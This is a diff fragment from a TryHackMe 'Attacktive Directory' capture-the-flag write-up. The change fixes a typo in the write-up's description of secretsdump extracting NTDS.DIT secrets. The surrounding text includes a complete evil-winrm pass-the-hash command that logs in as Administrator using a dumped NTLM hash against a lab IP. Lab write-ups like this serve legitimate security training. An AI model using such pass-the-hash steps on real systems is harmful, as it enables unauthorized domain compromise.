FullByte/FullByte.github.io/docs/tech/hack/challenges/tryhackme.com/attacktivedirectory.md

     [*] Auxiliary module execution completed
     ```

-Secretsdump.py usese the DRSUAPI method to get NTDS.DIT secrets.
+Secretsdump.py uses the DRSUAPI method to get NTDS.DIT secrets.
 We can feed evil-winrm with the hash of the adminstrator to gain access using this command: ```evil-winrm -i 10.10.12.33 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc```

 ??? output "evil-winrm output and flags"
     ```txt